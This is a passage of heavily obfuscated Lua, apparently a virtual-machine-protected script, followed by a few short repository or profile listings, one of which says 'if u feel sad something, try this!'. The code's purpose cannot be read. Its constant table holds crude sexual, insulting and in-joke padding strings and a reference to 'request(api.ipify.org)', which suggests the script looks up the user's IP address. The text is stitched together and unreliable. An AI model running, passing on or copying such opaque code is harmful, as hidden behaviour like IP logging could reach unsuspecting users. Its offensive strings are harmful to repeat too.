n[e]=nil;end;end;elseif(t<=a(687836035,d[133164721]))then if(t<=((f[428364464])or((function(e)f[428364464]=a((a(e,960127))-95127,998937);return(f[428364464]);end)(a(21201746,d[314288847])))))then if(t<=i(a(284980353,1043304625),a(12235710,11376511)))then if(t==15)then local a;local c;local t;local d=0;local function o(n,e,l)e=(d+e)%3 d=((e~=0)and d+((e<2)and n or-n)or d*n)%l return d end for d=2,32 do if o(4654,9626+d,2942)<1471 then if o(2417,8962+d,3752)<=1876 then if o(3875,6162+d,2836)<1418 then local o=e[l];local l=n[o];for e=o+1,e[r]do l=l..n[e];end;n[e[x]]=l;else end else if o(7292,8947+d,1652)>=826 then t=e[a];else end end else if o(1905,2451+d,3024)>=1512 then if o(7682,1498+d,1298)<649 then n[t]=c;else end else if o(9186,8391+d,2334)<1167 then a=x;else c=e[l];end end end end elseif(t<=i(a(248368112,1024609468),a(896920896,d["LJjSE"])))then local x=e[x];n[x]=0+(n[x]);n[x+1]=0+(n[x+1]);n[x+2]=0+(n[x+2]);local o=n[x];local d=n[x+2];if(d>0)then if(o>n[x+1])then c=e[l];else n[x+3]=o;end;elseif(o<n[x+1])then c=e[l];else n[x+3]=o;end;end;elseif(t>i(a(586700268,806763879),2097215))then local a;local c;local i;local f;local t;local d=0;local function o(n,e,l)e=(d+e)%3 d=((e~=0)and d+((1==e)and-n or n)or d*n)%l return d end for d=2,28 do if o(8290,1487+d,3344)<=1672 then if o(9551,4379+d,314)<157 then if o(2564,8960+d,1114)>=557 then else f=a[i];end else if o(5331,4648+d,3672)<=1836 then else t=e[c];end n[t]=f;end else if o(2372,3571+d,3880)<=1940 then if o(4426,3079+d,1624)>=812 then a=h;else c=x;end else if o(2754,9013+d,2128)>1064 then i=e[l];else end end end end elseif(t<i(975099149,79845))then local x=e[x];local o=e[l];local d=50*(e[r]-1);local l=n[x];local e=0;for o=x+1,o do l[d+e+1]=n[x+(o-x)];e=e+1;end;end;elseif(t<=a(329169656,d[274178420]))then if(t>i(110747827,841120))then local a;local f;local i;local s;local u;local h;local o=0;local t=0;local function d(e,n,l)e=(o+e)%3 o=((e~=0)and o+((1==e)and-n or n)or o*n)%l return o end for o=2,29 do if d(9334,2513+o,1098)<=549 then if d(4917,9540+o,1896)>948 then if d(8700,1050+o,1852)<926 then s=n;else end else h=a[i];if d(3642,8899+o,3402)<=1701 then else if t~=1 then n[h]=u;t=1;end;end end u=s[a[f]];else a=e;if d(5006,6256+o,2474)>1237 then if d(9395,8992+o,2518)<=1259 then f=l;else i=x;end else if d(5041,2008+o,1488)>=744 then local o=e[l];local l=n[o];for e=o+1,e[r]do l=l..n[e];end;n[e[x]]=l;else c=e[l];end end end end elseif(t<a(50024140,50024152))then n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local c;local t;local f;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=1,31 do if d(3779,3914+o,2380)>1190 then c=x;if d(7994,5039+o,1336)<668 then if d(7965,1475+o,3510)>=1755 then t=e[l];else end f=e[c];else if d(5971,8070+o,3556)<=1778 then n[e[x]]=n[e[l]];else end end else if d(2556,7642+o,1724)<=862 then if d(3951,8547+o,594)>297 then else end else if d(3715,8008+o,258)<129 then else n[f]=t;end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local f;local c;local t;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=1,32 do if d(8992,9329+o,3580)<=1790 then if d(6835,9216+o,2416)<1208 then f=x;if d(3395,4679+o,2754)>=1377 then else c=e[l];end else if d(1996,5236+o,1912)>956 then else end end t=e[f];else if d(7950,6995+o,2058)<1029 then if d(6454,4075+o,3026)<=1513 then else end else if d(6001,6567+o,540)<=270 then n[t]=c;else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];e=e[o];end;elseif(t==i(a(31590759,d[5026946]),a(930511775,931069596)))then n[e[x]]=n[e[l]];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=h[e[l]];e=e[o];n[e[x]]=h[e[l]];e=e[o];n[e[x]]=n[e[l]][e[r]];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=#n[e[l]];e=e[o];local d=e[x];n[d]=n[d](b(n,d+1,e[l]));for e=d+1,s do n[e]=nil;end;e=e[o];n[e[x]]=n[e[l]][n[e[r]]];e=e[o];local d=e[x];n[d]=n[d](n[d+1]);for e=d+1,s do n[e]=nil;end;e=e[o];local f;local t;local i;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and n or-n)or a*n)%l return a end for o=2,27 do if d(2839,3793+o,2996)<1498 then if d(1544,8460+o,1130)<=565 then if d(6832,6876+o,394)>=197 then n[e[x]]=n[e[l]]+e[r];else end else f=x;if d(3270,8237+o,3270)<=1635 then t=e[l];else c=e[l];end end i=e[f];else n[i]=t;if d(1394,8743+o,290)<145 then if d(4017,9598+o,3054)<=1527 then if(e[x]~=e[r])then c=c+1;else c=e[l];end;else if(n[e[x]]==e[r])then c=c+1;else c=e[l];end;end n[e[x]]=#n[e[l]];else if d(3693,3077+o,3162)<=1581 then n[e[x]]=h[e[l]];else end end end end local a=e[l];local d=n[a];for e=a+1,e[r]do d=d..n[e];end;n[e[x]]=d;e=e[o];local x=e[x];n[x](b(n,x+1,e[l]));for e=x+1,s do n[e]=nil;end;e=e[o];e=e[o];elseif(t<=i(a(825936637,535375565),1516755))then n[e[x]]=n[e[l]][e[r]];end;elseif(t<=((f[173197136])or(d[827675504](a(383023120,385801992),a,f,173197136))))then if(t<=i(a(449633311,475348140),a(662905503,663746372)))then if(t==((f[177858544])or(d[893233793](a(81750201,d[8995844]),a,f,177858544))))then n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local t;local f;local c;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=0,29 do if d(9114,2291+o,958)>479 then n[c]=f;if d(1364,9870+o,3528)>=1764 then if d(7894,1914+o,2244)>1122 then else end else if d(6750,2785+o,1296)<=648 then else end end else if d(4299,7324+o,2718)>1359 then if d(8853,8394+o,2128)>1064 then else end else if d(1598,8980+o,2616)<1308 then t=x;else end f=e[l];end c=e[t];end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];e=e[o];elseif(t<=i(a(273010204,d[583652750]),a(423370340,422141560)))then local e=e[x];do return b(n,e,u);end;end;elseif(t==i(a(656188492,905104583),2097207))then n[e[x]]=n[e[l]][n[e[r]]];elseif(t<=26)then local x=e[x];local d=n[x+2];local o=n[x]+d;n[x]=o;if(d>0)then if(o<=n[x+1])then c=e[l];n[x+3]=o;end;elseif(o>=n[x+1])then c=e[l];n[x+3]=o;end;end;elseif(t<=a(46598120,46598132))then if(t>i(584451091,137660))then local x=e[x];n[x](b(n,x+1,e[l]));for e=x+1,s do n[e]=nil;end;elseif(t<28)then n[e[x]]=e[l];e=e[o];local i;local f;local t;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=2,26 do if d(4311,7263+o,1912)<=956 then if d(7348,7552+o,3328)<1664 then if d(1753,5067+o,1448)<724 then else end else if d(9117,6696+o,318)>=159 then else i=x;end end f=e[l];else t=e[i];if d(3050,3801+o,1912)>=956 then if d(7286,3941+o,3172)>1586 then local o=e[l];local l=n[o];for e=o+1,e[r]do l=l..n[e];end;n[e[x]]=l;else n[t]=f;end else if d(5468,9184+o,3770)<=1885 then else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local f;local t;local i;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=0,26 do if d(7685,6171+o,2116)>1058 then if d(9565,7301+o,3944)<=1972 then if d(8669,2532+o,1052)<=526 then else end else if d(9896,7957+o,1468)>=734 then else end end else if d(4758,1032+o,2352)>1176 then f=x;if d(6001,7606+o,2812)<=1406 then t=e[l];else n[i]=t;end else if d(4396,2440+o,1588)<794 then else end end i=e[f];end end local f;local t;local i;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and n or-n)or a*n)%l return a end for o=1,33 do if d(7059,3328+o,2602)<=1301 then if d(3807,6514+o,3656)>=1828 then if d(2128,6682+o,2448)>1224 then if(e[x]~=e[r])then c=c+1;else c=e[l];end;else n[e[x]]=n[e[l]]+e[r];end if(n[e[x]]==e[r])then c=c+1;else c=e[l];end;else f=x;if d(1546,8784+o,3564)<1782 then i=e[f];else t=e[l];end end else if d(8485,5933+o,2792)<1396 then if d(7723,2170+o,1396)>=698 then else end else if d(8420,8453+o,604)>302 then n[i]=t;else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local f;local t;local i;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=2,34 do if d(6297,9333+o,710)>=355 then if d(3326,7055+o,1820)<=910 then if d(1280,7892+o,2702)>1351 then if(n[e[x]]==e[r])then c=c+1;else c=e[l];end;else t=e[l];end i=e[f];else if d(1385,3420+o,2788)<=1394 then else n[i]=t;end end else if d(8541,2963+o,444)<=222 then if d(8413,6279+o,2116)>1058 then f=x;else end else if d(9584,3953+o,884)<=442 then if(e[x]~=e[r])then c=c+1;else c=e[l];end;else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];e=e[o];end;elseif(t==((f[994969089])or(d[716315275](a(841399466,842134505),a,f,994969089))))then n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];e=e[o];elseif(t<=i(935939086,850338))then n[e[x]]=g(256);end;until false end);end;return m(O(),{},_())(...);end)(({[(35890628)]=((306227192));[((314288862-#("xXD3M0NSL4y3RXx")))]=((22910095));[(861570884)]=("\98");[((485402313-#("pussy popping")))]=("\110");[(442436378)]=(((#{}+678432234)));[((#{166;}+288726835))]=("\107");pUHAhnzN=((2047));["U0jJSoSu"]=("\114");[((#{(function(...)return 73,886,260;end)()}+274178417))]=(((329169653-#("GaySense?"))));[((129152779-#("luraph isnt that bad")))]=((884007259));[((712088269-#("skid")))]=((260));[((#{533;434;(function(...)return 468,625;end)()}+73956842))]=((21));[((#{}+727293704))]=(((31534892-#("poop sussy utilities"))));[(28686599)]=((8));[(161358332)]=((3));['qCugv0']=(((#{429;168;(function(...)return 533;end)()}+670)));["EobFeF"]=(((#{68;178;}+533738374)));[(335590045)]=((196));[((#{(function(...)return 841;end)()}+303638468))]=(((#{429;}+6)));[(32491735)]=("\112");[(244396227)]=((362824835));[(923367743)]=(((639-#("This community has done nothing but bring me down as a person. everyday i come in here and all you do is tear me down insult me hurt me with your words and do nothing but harm me emotionally physically mentally and I just cant take it any longer this server is so abusive and toxic its crazy."))));[(668912994)]=(((946507411-#("xXD3M0NSL4y3RXx"))));['NAPZY']=((function(x,e,l,n)l[n]=e(e(e(((x)-((#{25;455;557;57;}+161988)))-(92136),((588984-#("kjiyuftdyghjk")))),(165066)),(899762));return(l[n]);end));[((890164472-#("skid")))]=((338));[((#{645;(function(...)return 441,129,16,164;end)()}+329162734))]=(((21-#("i love gay porn"))));[(707275214)]=((200));[(175538043)]=((32));['N6gNU9qt']=("\50");['c0Jv34']=((1023));[(360567602)]=((16777216));["YZsy2"]=(((#{786;806;}+657564331)));[(708115242)]=((254142074));[(793444818)]=(((40-#("I only boosted to do this"))));[(981640682)]=((14));[(893233793)]=((function(x,e,n,l)n[l]=e(((e((x)-(634465),((#{766;672;505;240;}+567672))))-((172380-#("butts*"))))-(353008),((638080-#("Added new meme string!"))));return(n[l]);end));[((#{446;791;546;129;}+358358687))]=(((861570906-#("Added new meme string!"))));[(768386486)]=(((219-#("RY 4444 is living in a cave and is in debt"))));["JVrxe7jiy"]=(((#{910;824;245;}+162)));[(592582759)]=("\116");[((343598929-#("sussy imposter?")))]=(((#{18;271;(function(...)return 84,367,183,...;end)(178,441,475)}+15742)));[(178612124)]=(((27-#("request(api.ipify.org)"))));['EMZn9w']=(((32491754-#("perth loves femboys"))));[((#{330;}+49392055))]=(((#{}+248)));LJjSE=((896544264));[((402473645-#("Slowmode is enabled, but you are immune. Amazing")))]=("\35");[((#{459;879;(function(...)return 721;end)()}+24162168))]=("\37");[(583652750)]=(((#{}+72803345)));[(410242941)]=(((#{17;533;299;739;}+36017)));[(857068264)]=(((#{391;983;}+43050)));[((657564349-#("gggggggggggggggg")))]=("\109");[((31970600-#("Man make it 6 hours")))]=("\51");[((#{758;}+362824834))]=("\104");[(35997585)]=((402473597));[(446349649)]=(((446299-#("perth moment"))));[((#{292;297;250;(function(...)return 237;end)()}+241719827))]=(((199-#("dont buy strawberrys hub"))));['lqTxqp']=((31970581));[((390643828-#("Slowmode is enabled, but you are immune. Amazing")))]=((106));[(564492381)]=((485402300));[((#{870;309;775;577;}+434664725))]=(((548-#("This community has done nothing but bring me down as a person. everyday i come in here and all you do is tear me down insult me hurt me with your words and do nothing but harm me emotionally physically mentally and I just cant take it any longer this server is so abusive and toxic its crazy."))));[(355142393)]=(((#{233;932;883;184;}+592582755)));[((#{}+444816131))]=((20));[((#{830;534;259;269;}+586377404))]=(((#{72;594;119;(function(...)return 133,659,...;end)(893,704)}+985253506)));['NSTape1enI']=((function(x,e,n,l)n[l]=e(e((e(x,(796620)))-((375087-#("is that a password protected homework folder i see?"))),(54502)),((688138-#("funeralW"))));return(n[l]);end));[(618746567)]=((225278046));[((552536915-#("fuck strawberry")))]=((function(l,x,e,n)e[n]=((x(l,((329729-#("gonna spam it <a:trolla:810117626327465996>")))))-(919150))-((#{148;527;475;931;}+369864));return(e[n]);end));['FEJn3eC']=("\100");[((984259759-#("federal agency of deez nuts")))]=((813779461));[((#{453;}+133164720))]=(((#{443;37;911;}+687836050)));['CjSc0']=((24162171));[(5026946)]=(((604310871-#("im a spice head"))));[(729972129)]=("\101");[((294522033-#("#unban jacob federal and perth are both black")))]=((847550071));[(233890035)]=(((#{499;(function(...)return 715,146;end)()}+65533)));[((#{335;199;}+49315632))]=("\99");[(90578850)]=((5000));[(944163545)]=(((181-#("is that a password protected homework folder i see?"))));[((#{366;(function(...)return 779,463,891,61;end)()}+827675499))]=((function(x,e,n,l)n[l]=e(e((((x)-((#{891;293;8;}+730622)))-((#{990;141;(function(...)return 263,204;end)()}+859025)))-((#{194;}+382883)),(806905)),(49725));return(n[l]);end));[(73278061)]=(((#{395;377;675;(function(...)return 655,...;end)(706)}+407)));[(499751106)]=((824));[((#{992;82;181;876;(function(...)return 465,499,18,334;end)()}+144039529))]=((521));[((716315295-#("poop sussy utilities")))]=((function(x,l,n,e)n[e]=l((l(x,(307232)))-(477345),((833260-#("skilled issue"))));return(n[e]);end));[(678432234)]=("\120");U6b8x33L=((729972129));[(884173955)]=(((#{441;}+37986)));[((#{312;195;799;(function(...)return 190,747;end)()}+533738371))]=("\105");[(621048503)]=(((23-#("Jason hackson tension"))));[((#{432;568;668;954;}+910795263))]=((392));['S8U2zw']=(((#{320;(function(...)return 825,298;end)()}-2)));[((231403883-#("fixed")))]=(((26-#("request(api.ipify.org)"))));[((464875085-#("its also strawberries*")))]=(((#{}+36)));[(644836242)]=(((#{23;}+89)));[(37277982)]=(((32-#("request(api.ipify.org)"))));[(544500260)]=(((#{115;138;}+49315632)));[(31534872)]=("\108");[(502086735)]=((function(x,e,l,n)l[n]=e(((e(x,((#{293;(function(...)return 417,156,82,589;end)()}+532372))))-(602504))-(402469),((#{(function(...)return;end)()}+161300)));return(l[n]);end));[((#{455;}+452118983))]=((288726836));[(828536151)]=(((#{885;(function(...)return;end)()}+30)));[(531620375)]=(((#{(function(...)return 748;end)()}+855250540)));Ct5pGk=((40550));[(655990340)]=((807675296));[((847550084-#("Jayy was here")))]=("\97");['J6BOkM0Ws']=("\41");[(225278046)]=("\119");[(520964251)]=(((#{261;}+95966119)));[((#{856;834;203;754;(function(...)return 687;end)()}+985253508))]=("\102");[((788685794-#("im a spice head")))]=(((#{555;379;39;394;(function(...)return 767;end)()}-5)));[(426584394)]=((39203));[((#{791;(function(...)return 682,156,28;end)()}+203133931))]=(((#{584;191;(function(...)return 817,439,...;end)(986,765,208,895)}+44)));[(306227192)]=("\115");[(254142074)]=("\111");[((137536669-#("i wana kiss a whole dude")))]=(((805038-#("ok well"))));["lkjjFVmiS"]=("\117");[((813779753-#("This community has done nothing but bring me down as a person. everyday i come in here and all you do is tear me down insult me hurt me with your words and do nothing but harm me emotionally physically mentally and I just cant take it any longer this server is so abusive and toxic its crazy.")))]=("\40");[(12054252)]=((867));[((8995860-#("fuck me daddy :)")))]=((83652761));}),...)})do return e end;
Heartware-Instruments
r u ok
iliketohelppeople
if u feel sad something, try this!
Gabriel-1023
No description available
jerrayl-psychpress
No description available